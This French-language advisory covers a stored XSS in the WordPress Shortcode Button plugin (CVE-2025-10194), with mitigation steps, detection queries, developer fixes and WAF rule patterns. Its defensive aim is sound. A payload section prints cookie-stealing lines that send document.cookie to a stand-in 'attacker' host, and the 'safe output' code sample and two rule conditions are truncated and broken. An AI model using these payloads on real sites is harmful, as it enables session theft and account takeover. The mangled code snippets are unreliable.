WBase de données des vulnérabilités WordPress

Hong Kong Security Advisory Bouton de Code Court XSS(CVE202510194)

Plugin de bouton shortcode WordPress
0
Partages
0
0
0
0
Nom du plugin Plugin de bouton shortcode WordPress
Type de vulnérabilité XSS stocké
Numéro CVE CVE-2025-10194
Urgence Faible
Date de publication CVE 2025-10-15
URL source CVE-2025-10194

Bouton de shortcode (≤ 1.1.9) — XSS stocké par un contributeur authentifié (CVE-2025-10194) : Ce que les propriétaires de sites WordPress doivent faire

Auteur : Expert en sécurité de Hong Kong | Date : 2025-10-15

Résumé : Une vulnérabilité de script intersite (XSS) stockée authentifiée affectant le plugin Bouton de shortcode (versions ≤ 1.1.9, suivie sous CVE-2025-10194) permet à un utilisateur à faible privilège (Contributeur) d'injecter du JavaScript qui est stocké et exécuté lorsque d'autres utilisateurs consultent le contenu. Cet article explique la cause technique, l'impact dans le monde réel, les mesures d'atténuation étape par étape pour les propriétaires de sites, les corrections des développeurs, les techniques de détection et des conseils pratiques sur le patching virtuel.

TL;DR

  • Vulnérabilité : XSS stocké dans le Bouton de shortcode ≤ 1.1.9.
  • CVE : CVE-2025-10194.
  • Privilège requis : Contributeur (utilisateur authentifié avec la capacité d'ajouter ou de modifier des articles).
  • Risque : Exécution arbitraire de JavaScript dans le contexte des visiteurs du site ou des administrateurs selon l'endroit où le plugin rend le contenu ; cela peut entraîner le vol de session, la défiguration de contenu, le redirection vers des malwares, ou la prise de contrôle de l'administrateur.
  • Correction officielle : Non disponible au moment de la divulgation.
  • Actions immédiates : Supprimer/désactiver le plugin si vous n'en avez pas besoin ; restreindre les capacités des contributeurs ; auditer et assainir le contenu ; déployer un patch virtuel (règle WAF). Des exemples de règles et de modèles de détection sont inclus ci-dessous.
  • À long terme : Corriger le plugin lorsqu'une mise à jour officielle est publiée ou appliquer des corrections de codage sécurisé dans le code du plugin.

Pourquoi cela importe (explication pratique)

La plupart des propriétaires de sites WordPress supposent que seuls les comptes à privilèges élevés peuvent insérer des balises dangereuses. Les shortcodes changent la donne : les plugins analysent les attributs de shortcode et rendent du HTML dans le contenu des articles et parfois dans l'interface admin. Si un plugin ne parvient pas à assainir ou à échapper aux attributs de shortcode lors de l'enregistrement ou du rendu, un Contributeur peut intégrer du JavaScript qui est stocké dans la base de données et s'exécute plus tard lorsque quiconque consulte cette page — y compris les Éditeurs et Administrateurs. C'est un XSS stocké.

Un attaquant avec un compte de Contributeur peut :

  • Insérer un shortcode malveillant dans un article ou une page qu'il contrôle et qui stocke du JavaScript dans la base de données.
  • Attendre qu'un Éditeur ou un Administrateur consulte l'article (par exemple, prévisualiser ou modifier), provoquant l'exécution dans leur navigateur et permettant des actions nécessitant les informations d'identification de session/auth de ces utilisateurs.
  • Exfiltrer des cookies, effectuer des actions au nom de la victime (CSRF via JavaScript), créer des comptes administrateurs supplémentaires, ou injecter des portes dérobées persistantes.

Comme le plugin rend le bouton, la vulnérabilité peut se déclencher à la fois sur les affichages front-end et back-end, augmentant la surface d'attaque.

Cause racine technique (niveau élevé)

Modèle typique de cause racine pour XSS stocké dans les plugins de shortcode :

  1. Le plugin accepte des attributs contrôlés par l'utilisateur (par exemple, étiquette, url, titre, classe).
  2. Il ne sanitize pas l'entrée lors de l'enregistrement, ou n'échappe pas la sortie lors du rendu.
  3. L'attribut est stocké (dans post_content, postmeta, ou options) et est ensuite imprimé sans échapper correctement (esc_html, esc_attr, esc_url) ou avec un filtrage insuffisant comme strip_tags sans liste blanche.
  4. Le plugin fait confiance au contenu fourni par le contributeur ou s'appuie sur les internes de WordPress qui ne sanitizent pas automatiquement les attributs de shortcode.
  5. Lorsque les données stockées sont rendues (front-end, aperçu de l'éditeur ou vue de liste admin), le JavaScript injecté s'exécute.

Des exemples classiques incluent les balises script ou les attributs de gestionnaire d'événements (onmouseover=, onclick=), les URLs javascript: dans les attributs href, ou les entités HTML qui sont mal décodées avant le rendu.

Quels sites sont affectés ?

  • Sites avec le plugin Shortcode Button installé et actif à la version 1.1.9 ou antérieure.
  • Sites qui permettent aux utilisateurs de s'inscrire ou qui attribuent le rôle de Contributeur à des personnes non fiables.
  • Sites où les contributeurs peuvent ajouter ou modifier des articles/pages ou d'autres contenus qui pourraient inclure des shortcodes.

Si vous n'êtes pas sûr que ce plugin soit installé, vérifiez votre admin WordPress sous Plugins → Plugins installés, ou recherchez dans votre système de fichiers des dossiers nommés comme le slug du plugin.

Liste de vérification d'atténuation immédiate (propriétaire de site / admin)

Si vous gérez un site WordPress qui utilise Shortcode Button ≤ 1.1.9, suivez immédiatement cette liste de vérification priorisée :

  1. Mettez le site en mode maintenance pour le travail admin (optionnel mais recommandé).
  2. Désactivez le plugin Shortcode Button.
    • Si vous dépendez de la fonctionnalité du plugin et ne pouvez pas le supprimer immédiatement, procédez aux étapes de patch virtuel WAF ci-dessous et restreignez les actions des contributeurs jusqu'à ce qu'un correctif soit disponible.
  3. Auditez le contenu créé par les contributeurs :
    • Recherchez des articles et des pages pour les shortcode(s) du plugin et inspectez les attributs pour des charges utiles suspectes telles que <script>, onmouseover=, javascript :, eval(, document.cookie, ou des équivalents encodés.
    • Exemples de chaînes de recherche à exécuter dans la base de données (utilisez wp-cli ou phpMyAdmin, et sauvegardez toujours avant de modifier la DB) :
    SELECT * FROM wp_posts WHERE post_content LIKE '%[shortcode%button%';
  4. Supprimez ou assainissez tout shortcode ou attribut suspect. Si vous n'êtes pas sûr, supprimez complètement l'insertion de shortcode de l'article/page.
  5. Examinez et limitez les privilèges des Contributeurs :
    • Rétrogradez temporairement ou supprimez les comptes de Contributeur que vous ne trouvez pas fiables.
    • Modifiez les paramètres d'inscription du site afin que les nouveaux utilisateurs ne soient pas automatiquement assignés comme Contributeur.
  6. Analysez le site :
    • Exécutez une analyse complète du système de fichiers et de la base de données à la recherche de logiciels malveillants. Recherchez des instances supplémentaires de scripts injectés dans le contenu des publications, les options ou les fichiers de thème/plugin.
  7. Faire tourner les identifiants :
    • Forcez les réinitialisations de mot de passe pour les comptes administrateur/éditeur si vous soupçonnez un abus.
    • Faites tourner les identifiants API (clés API REST, mots de passe d'application).
  8. Préparez-vous à la récupération :
    • Assurez-vous d'avoir une sauvegarde propre d'avant l'ajout du contenu malveillant.
    • Si le site a été compromis, restaurez à partir d'une sauvegarde connue comme bonne et enquêtez sur la cause profonde.
  9. Surveillez le trafic du site et les journaux pour détecter une activité suspecte (requêtes POST inattendues, vues de pages de la zone admin par des contributeurs).
  10. Appliquez un patch virtuel avec votre WAF (détails et exemples de règles ci-dessous).

Détection : comment trouver les charges utiles XSS stockées laissées par des contributeurs

Les charges utiles XSS stockées peuvent être subtiles. Utilisez une combinaison de scans automatisés et d'inspections manuelles.

  • Recherchez dans la table des publications (wp_posts.post_content) le nom du shortcode du plugin et tout tag HTML : 
    SELECT ID, post_title FROM wp_posts WHERE post_content REGEXP '\\[shortcode(_|-)button|\\[shortcodebutton';
  • Recherchez des balises script ou des gestionnaires d'événements n'importe où dans le contenu des publications et les métadonnées : 
    SELECT ID FROM wp_posts WHERE post_content REGEXP '<script|onmouseover=|onmouseover|onclick=|javascript:';
  • Recherchez des payloads en base64, des entités encodées ou des payloads codés en hexadécimal — les attaquants obfusquent souvent : 
    SELECT * FROM wp_posts WHERE post_content LIKE '%&#x%';
  • Vérifiez les révisions de publications et les pièces jointes — le contenu malveillant peut être stocké dans des révisions ou des champs de métadonnées.
  • Si vous avez des journaux d'accès, recherchez de nouvelles adresses IP de contributeurs soumettant des POST à /wp-admin/post.php ou /wp-admin/admin-ajax.php.
  • Utilisez votre scanner de logiciels malveillants pour signaler des motifs JavaScript suspects.

Comment supprimer en toute sécurité les charges utiles malveillantes stockées

  1. Exportez les publications suspectes vers un fichier avant de les modifier.
  2. Remplacez ou supprimez les attributs de shortcode offensants :
    • Si vous êtes certain que l'ensemble du shortcode est malveillant, supprimez le shortcode (retirez-le du contenu de la publication).
    • Si le shortcode est nécessaire, assainissez les attributs en ne conservant que les valeurs attendues (étiquette en texte brut, URL sécurisée, classes CSS limitées).
  3. Si de nombreuses publications sont affectées, écrivez un script wp-cli sécurisé qui :
    • Charge chaque publication,
    • Analyse les shortcodes avec l'API de shortcode de WordPress,
    • Valide et assainit les attributs avec wp_kses, esc_url_raw, sanitize_text_field,
    • Met à jour les publications uniquement une fois assainies.
  4. Après le nettoyage, rescannez et surveillez.

Important : Travaillez toujours sur une copie de sauvegarde ou de staging de la base de données lors de la réalisation de mises à jour en masse.

Conseils pour les développeurs — comment le plugin doit être corrigé (pour les auteurs de plugins)

Si vous êtes un développeur de plugin ou responsable de la maintenance de Shortcode Button, ces actions correctives sont le minimum requis :

  1. Assainissez l'entrée immédiatement :
    • Au moment de sauvegarder les données fournies par l'utilisateur, validez et assainissez les attributs avec des fonctions appropriées :
    • Pour les attributs textuels : sanitize_text_field()
    • Pour les fragments HTML sécurisés : wp_kses() avec des balises/attributs strictement autorisés
    • Pour les classes CSS : liste blanche des noms de classes autorisés
    • Pour les URL : esc_url_raw()
  2. Échapper la sortie :
    • Lors du rendu HTML, échappez toujours les données selon le contexte :
    • Valeurs d'attribut : esc_attr()
    • Contenu des éléments : esc_html()
    • URLs dans href/src : esc_url()
  3. Utilisez des vérifications de capacité appropriées :
    • Assurez-vous que les actions administratives ou les points de terminaison AJAX modifiant le contenu vérifient current_user_can() correctement et utilisent check_admin_referer() ou des nonces.
  4. Évitez d'appeler do_shortcode() sur des entrées utilisateur brutes sans assainissement.
  5. Respectez les restrictions de rôle de WordPress : ne pas accorder unfiltered_html ou des capacités similaires à des rôles à faible privilège par défaut.
  6. Ajoutez un filtrage côté serveur contre javascript : et des gestionnaires d'événements en ligne si les attributs attendent des URLs ou du texte brut.
  7. Ajoutez des tests unitaires pour les cas limites : assurez-vous que les attributs contenant <script> ou des gestionnaires d'événements sont toujours neutralisés.
  8. Publiez un correctif de sécurité rapidement et incluez un journal des modifications faisant référence à l'adresse de CVE-2025-10194.

Modèle de sortie sécurisé suggéré (exemple) :

// Analyser les attributs'<a class="%s" href="/fr/%s/"%s>%s</a>',;

Patching virtuel : règles WAF que vous pouvez appliquer dès maintenant

Lorsqu'un correctif officiel n'est pas immédiatement disponible, le patching virtuel via un pare-feu d'application web (WAF) peut protéger les sites en bloquant les tentatives d'exploitation. Ci-dessous se trouvent des stratégies de détection d'exemple et des règles d'échantillon que vous pouvez mettre en œuvre dans votre pare-feu. Ce sont des modèles et doivent être ajustés pour éviter les faux positifs. Testez toujours d'abord en préproduction.

  1. Bloquez les POST qui créent ou modifient des publications et incluent le shortcode ciblé avec des charges utiles suspectes :
    • Regex générique pour détecter les balises script à l'intérieur des attributs de shortcode :
    Modèle : (?i)\[shortcode[-_]?button[^\]]*(?:<script\b|on\w+\s*=|javascript:)

    Action : Bloquer (ou défier avec CAPTCHA), enregistrer les détails et alerter les administrateurs.

  2. Bloquez les requêtes où post_content contient des gestionnaires d'événements ou des balises script : 
    Modèle : (?i)(<script\b|on\w+\s*=|javascript:|document\.cookie|window\.location)

    Appliquer à : Requêtes POST à /wp-admin/post.php, /wp-admin/post-new.php, /wp-admin/admin-ajax.php lorsque l'action est insérer ou enregistrer la publication.

  3. Exemple de pseudo-règle de style ModSecurity (conceptuel) : 
    SecRule REQUEST_METHOD "POST" "chain,phase:2,block,id:100001,msg:'Bloquer la tentative de XSS stockée dans le bouton Shortcode',severity:2"
  4. Ciblez spécifiquement les shortcodes dans le corps de la requête :

    Si votre WAF inspecte le corps de la requête, ajoutez une règle qui scanne le shortcode et refuse lorsque ses attributs contiennent un contenu semblable à un script.

  5. Protection de la réponse (filtrage de la sortie HTML) :

    Si possible, appliquez une transformation sortante qui neutralise les gestionnaires d'événements en ligne et les balises script lors du rendu du contenu des publications dans les pages d'administration. Faites attention : modifiez le contenu sortant uniquement si vous contrôlez entièrement la correction de la transformation pour éviter de casser la fonctionnalité du site.

  6. Limitez le taux et défiez les actions des comptes contributeurs :

    Exigez un CAPTCHA ou une vérification à deux facteurs pour les nouveaux comptes contributeurs afin de prévenir l'exploitation automatisée ou de masse.

  7. Notifiez / alertez :

    Configurez le WAF pour notifier les administrateurs du site lorsqu'une requête est bloquée correspondant à la règle XSS, y compris l'IP déclencheur, l'agent utilisateur et l'URI de la requête.

Liste de contrôle judiciaire si vous soupçonnez une exploitation

Si vous trouvez des signes qu'un XSS stocké a été exploité, traitez-le comme une violation potentielle :

  1. Préserver les preuves :
    • Exporter les journaux (serveur web, application) et les lignes de base de données avec des charges utiles malveillantes.
    • Faire des instantanés du système de fichiers.
  2. Identifier le(s) compte(s) attaquant(s) initial(aux) :
    • Rechercher des comptes de contributeurs créés récemment ou des comptes ayant effectué des modifications de publication.
  3. Vérifiez les indicateurs secondaires :
    • Nouveaux utilisateurs administrateurs, fichiers de plugins/thèmes modifiés, tâches planifiées inattendues (wp_cron), téléchargements inconnus dans wp-content/uploads, et fichiers de base modifiés.
  4. Faire tourner les secrets :
    • Réinitialiser les mots de passe pour tous les comptes administrateurs/éditeurs et faire tourner les clés et jetons API.
  5. Scanner l'ensemble du site à la recherche de portes dérobées :
    • Vérifier les fichiers PHP dans les téléchargements, les fichiers encodés en base64, les tâches cron malveillantes.
  6. Nettoyez et restaurez :
    • Si la compromission est minimale et confinée au contenu des publications, nettoyer les publications et faire tourner les identifiants.
    • Si les fichiers de base ou de plugin ont été modifiés, restaurer à partir d'une sauvegarde propre et réappliquer des versions de plugins de confiance.
  7. Contacter votre hébergeur si vous soupçonnez une persistance au niveau du serveur (rootkits, clés SSH).
  8. Signaler aux parties concernées (si nécessaire) : partenaires, clients ou contacts réglementaires.

Comment détecter les tentatives avant qu'elles ne réussissent (prévention et surveillance)

  • Limiter qui peut télécharger et qui peut ajouter des shortcodes : garder le rôle de Contributeur étroitement contrôlé.
  • Surveiller les requêtes POST vers les points de terminaison administratifs : utiliser des journaux/alertes pour les POST vers post.php contenant des shortcodes ou du contenu semblable à des scripts.
  • Mettre en place des notifications de changement de contenu : recevoir des alertes lorsque des publications changent ou lorsque des révisions sont créées.
  • Exécuter des analyses automatisées périodiques qui recherchent des shortcodes dans le contenu des publications combinés avec des marqueurs de script.
  • Appliquez une authentification forte pour les comptes à privilèges élevés (2FA, SSO).

Pourquoi un XSS de niveau Contributeur est particulièrement risqué

De nombreux propriétaires de sites supposent que les contributeurs ne peuvent pas causer de dommages majeurs. Bien que les contributeurs ne puissent pas publier par défaut, les éditeurs et les administrateurs consultent régulièrement le contenu des contributeurs (aperçus, écrans d'édition, files d'attente de révision). Un attaquant peut exploiter ce flux de travail humain :

  • Un contributeur insère un lien court ou un bouton dans un brouillon de publication.
  • Un éditeur ouvre l'aperçu de la publication pour révision — la charge utile stockée s'exécute dans le navigateur de l'éditeur.
  • La charge utile peut effectuer des actions dans le contexte de l'éditeur — par exemple, créer des comptes administrateurs via des requêtes authentifiées, modifier les paramètres des plugins ou exfiltrer des cookies de session.

Comme la charge utile est stockée, elle persiste indéfiniment et peut s'exécuter chaque fois qu'un administrateur ou un visiteur charge le contenu compromis.

Exemples pratiques de charges utiles dangereuses que vous pourriez trouver

  • Balise de script en ligne : 
    <script>fetch('https://attacker/t/'+document.cookie)</script>
  • Gestionnaire d'événements dans les attributs : 
    [shortcode_button label="Cliquez" url="#" onclick="document.location='https://attacker/?c='+document.cookie"]
  • javascript : URL dans href : 
    [shortcode_button label="Aller" url="javascript:"]
  • JavaScript encodé/obfusqué : 
    Utilisation de l'encodage d'entité comme  ou astuces de décodage base64.

Lorsque vous voyez l'un de ces motifs dans le contenu des publications ou les attributs de shortcode, considérez-les comme malveillants jusqu'à preuve du contraire.

Scripts de nettoyage/scannage de contenu recommandés (approche wp-cli)

Utilisez wp-cli si vous êtes à l'aise — c'est plus rapide et plus sûr sur les grands sites.

  1. Trouvez les publications contenant le shortcode : 
    wp db query "SELECT ID, post_title FROM wp_posts WHERE post_content LIKE '%[shortcode_button%';"
  2. Exporter les articles affectés : 
    wp post get  --field=post_content > /tmp/post-.txt
  3. Inspecter manuellement puis assainir ou mettre à jour à l'aide d'un script de désinfection PHP qui utilise des fonctions WordPress pour analyser et nettoyer les shortcodes.

Remarque : Ne pas exécuter de commandes destructrices sans sauvegardes.

Directives de communication pour les opérateurs de site et les clients

  • Informer les clients des risques et des actions que vous entreprenez.
  • Fournir un calendrier estimé pour l'atténuation.
  • Pour plus de transparence, expliquer que la version du plugin est vulnérable et qu'un correctif officiel n'est pas encore disponible (si c'est le cas).
  • Offrir des options : suppression immédiate du plugin, patching virtuel WAF plus nettoyage, ou migration vers une solution alternative sécurisée.

Directives neutres sur la défense en couches

Adoptez une approche en couches :

  1. Prévenir — limiter les autorisations et durcir la zone d'administration.
  2. Détecter — analyse continue des articles, du système de fichiers et de l'activité administrative.
  3. Protéger — patching virtuel via des règles WAF qui bloquent les requêtes tentant d'exploiter des modèles XSS de shortcode connus.
  4. Répondre — supprimer les charges utiles malveillantes stockées, nettoyer les fichiers infectés, faire tourner les identifiants, surveiller la réinjection.

Exemples de modèles de règles WAF pour les implémenteurs (conceptuel)

Ci-dessous se trouvent des modèles textuels — adaptez-les à la syntaxe de votre WAF.

  • Bloquer les POST vers les points de terminaison d'articles administratifs contenant des shortcodes avec des modèles de script : 
    Condition :.
  • Bloquer tout corps de requête contenant des balises de script encodées combinées avec des shortcodes : 
    Condition :.

Rappelez-vous : ajustez pour les faux positifs (par exemple, contenu légitime contenant le mot “script” dans un exemple de code) — mieux vaut défier (CAPTCHA) que de bloquer complètement dans des contextes à haut risque.

Atténuations à long terme et meilleures pratiques de durcissement

  • Réduisez le nombre d'utilisateurs ayant un accès en écriture.
  • Utilisez des flux de travail de modération de contenu pour examiner le contenu des contributeurs avant que les éditeurs ne l'ouvrent.
  • Appliquez l'authentification à deux facteurs pour tous les éditeurs et administrateurs.
  • Scannez régulièrement les plugins vulnérables et appliquez les mises à jour rapidement.
  • Ayez un plan de réponse aux incidents et une stratégie de sauvegarde.
  • Limitez l'accès à l'API REST et à XML-RPC autant que possible.
  • Surveillez les canaux de mise à jour des plugins et les avis des fournisseurs pour les versions corrigées.

Exemple de politique : Flux de travail de modération de contenu

  1. Les contributeurs peuvent uniquement créer des brouillons.
  2. Le rôle d'éditeur reçoit une notification par e-mail d'un nouveau brouillon.
  3. L'éditeur examine dans un aperçu isolé (de préférence avec un aperçu non authentifié ou une session restreinte).
  4. Si le contenu inclut des shortcodes de plugins tiers, l'éditeur inspecte les attributs avant d'approuver.
  5. Si suspect, le contenu est renvoyé au contributeur et étiqueté pour révision de sécurité.

Cette approche minimise la chance qu'un éditeur ou un administrateur exécute du contenu non inspecté.

FAQ

Q : Si les contributeurs ne peuvent pas publier, pourquoi est-ce dangereux ?
A : Parce que les éditeurs et les administrateurs consultent et prévisualisent régulièrement les brouillons. Le XSS stocké s'exécute chaque fois que le contenu est rendu dans un navigateur — pas seulement sur les pages publiées.

Q : Puis-je résoudre cela en révoquant les privilèges des contributeurs ?
A : La révocation est un palliatif rapide mais ne supprime pas les charges utiles stockées déjà dans la base de données. Combinez la restriction des privilèges avec le nettoyage du contenu et les protections WAF.

Q : La désactivation des shortcodes à l'échelle mondiale va-t-elle casser mon site ?
A : Désactiver ou supprimer le plugin peut enlever des boutons/pages qui en dépendent. Toujours sauvegarder et tester sur un environnement de staging avant des changements importants. Si le plugin est essentiel, le patching virtuel + la désinfection du contenu est le chemin le plus sûr jusqu'à ce qu'un patch officiel soit publié.

Recommandations finales (que faire maintenant — liste de contrôle concise)

  1. Identifiez si le plugin Shortcode Button est installé et sa version.
  2. Désactivez le plugin si vous n'en avez pas besoin ; sinon, appliquez immédiatement les règles WAF.
  3. Auditez les publications pour les shortcodes et retirez ou désinfectez les attributs suspects.
  4. Limitez les privilèges des contributeurs et vérifiez tous les comptes utilisateurs.
  5. Scannez le site à la recherche de signes de compromission et prenez des mesures d'analyse judiciaire si nécessaire.
  6. Appliquez l'authentification à deux facteurs et des mots de passe forts pour les éditeurs/admins.
  7. Utilisez un WAF ou un service de sécurité de confiance pour déployer des patches virtuels jusqu'à ce qu'une mise à jour officielle soit publiée.

Si vous avez besoin d'aide pour mettre en œuvre des règles WAF, scanner le contenu pour des charges utiles stockées, ou exécuter un plan de remédiation propre, engagez un professionnel de la sécurité qualifié ou un intervenant en cas d'incident pour aider avec le patching virtuel et le nettoyage du contenu. Une action rapide et méthodique réduit les risques et protège les utilisateurs à privilèges élevés contre l'exploitation.

0 Partages :
Partager 0
Tweeter 0
Épingler 0

— Article précédent

Avis de sécurité de Hong Kong Importateur de thème CSRF (CVE202510312)

Article suivant —

Alerte de cybersécurité civique sur l'injection SQL de Office (CVE202510045)

Vous aimerez aussi